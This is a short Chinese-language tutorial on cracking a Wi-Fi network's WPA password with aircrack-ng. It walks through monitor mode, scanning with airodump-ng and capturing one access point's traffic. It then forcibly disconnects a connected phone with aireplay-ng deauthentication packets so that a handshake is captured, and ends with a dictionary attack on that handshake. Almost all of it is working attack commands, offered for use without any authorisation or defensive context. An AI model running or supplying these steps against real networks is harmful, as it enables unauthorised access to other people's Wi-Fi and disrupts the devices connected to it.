1.关闭影响进程
airmon-ng check kill
将要进入监听模式的无线网卡断开它已连接的AP
2.查看无线网卡的名字
ifconfig ,例如 wlan0
3.进入监听模式:
airmon-ng start wlan0
启动成功, ifconfig 后发现多了一个mon0
4.扫描附件wifi
airodump-ng mon0
扫描后,终端显示为上下2个部分,按空格键可以启动/停止动态刷新, 'a'键可以调整显示视图,上下方向键可以选定一行方便查看。其中默认视图中,上半部分是扫描到的AP以及其属性,例如信号强度,通道,bssid,essid等,下半部分显示的是有哪些机器(对应于STATE栏,就是它mac)连接到这个AP(对应的就是ESSID)。
5.监听指定AP
执行下列命令要停止扫描,及停止步骤4的命令,因为扫描会不断切换channel,而监听某个AP时,这个AP的channel是固定的。
airodump-ng --bssid AP‘s mac -c channel -w capfile mon0
--bssid:指定监听哪个AP(由AP’s mac指定)
-c :指定这个AP的通道
-w:捕获的包存入文件capfile
注意选定AP:
1.步骤4下半部分的 BSSID和STATE要都存在一个mac,意思是探测到一个wifi的BSSID,并且这个wifi被一个或多个机器连接上(STATE栏指示其mac),步骤6解释为什么要这样选定。
6.强制重连,使握手包出现
aireplay-ng -0 2 -a AP's bssid -c phone's mac mon0
| | | |___连上这个wifi的手机的mac
| | |______________wifi的 BSSID
| |______________________攻击次数
|_________________________攻击方法
攻击会导致手机和wifi断开连接。
1.为什么要抓握手包?
握手包里包含密码信息
2.握手过程:
假设是我的手机去连wifi,第一次肯定会要你输入密码。
手机:我要连接你wifi
wifi:你的密码
手机:这是我的密码
wifi:检查密码,正确,建立连接,错误,滚。
对于一个已经过密码验证的手机和wifi,它们建立连接后交换的数据只不过是一些上网数据,抓它们没用,要抓就要抓包含密码的握手包,怎么让一个已验证过密码的连接再次出现握手包?最快的方法就是把手机踢下线,然后手机会自动重连,或者用手机的人发现手机断网了,他就会去连一下,这时握手包就出现了。这也就是为什么要选定一个有机器连接上的wifi来监听。
不久就会在步骤5那个终端的第一行的末尾出现抓到握手包。若没出现,过几分钟重复攻击。
7.跑字典
aircrack-ng capfile.cap -w passwd.lst